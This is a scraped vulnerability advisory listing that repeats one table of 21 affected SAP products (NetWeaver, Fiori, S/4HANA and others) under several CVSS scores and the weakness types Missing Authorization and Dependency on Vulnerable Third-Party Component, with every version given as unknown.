SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
5.0 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
6.5 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-862
- Missing Authorization
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-862
- Missing Authorization
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-862
- Missing Authorization
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
8.1 (High)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
6.5 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
4.3 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
6.1 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
9.9 (Critical)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
4.3 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
4.3 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
5.3 (Medium)
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (My Timesheet Fiori 2.0 application)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Landscape Transformation Replication Server
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver (Service Data Download)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Adobe Document Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (Deploy Web Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver AS Java (IIOP Service)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver Application Server for ABAP (Background Processing)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP NetWeaver and ABAP Platform (Service Data Collection)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Netweaver (RMI-P4)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP S/4HANA (Private Cloud or On-Premise)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Supplier Relationship Management
|
vers:unknown/* |
CWE-1395
- Dependency on Vulnerable Third-Party Component
Affected products
Known affected
21 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
SAP / Business Planning and Consolidation
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver ABAP Platform
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / NetWeaver AS Java
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / Netweaver
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Business One (SLD)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori (Launchpad)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP Fiori App (F4044 Manage Work Center Groups)
|
vers:unknown/* | ||
|
vers:unknown/*
SAP / SAP HCM (Approve Timesheets Fiori 2.0 application)
|
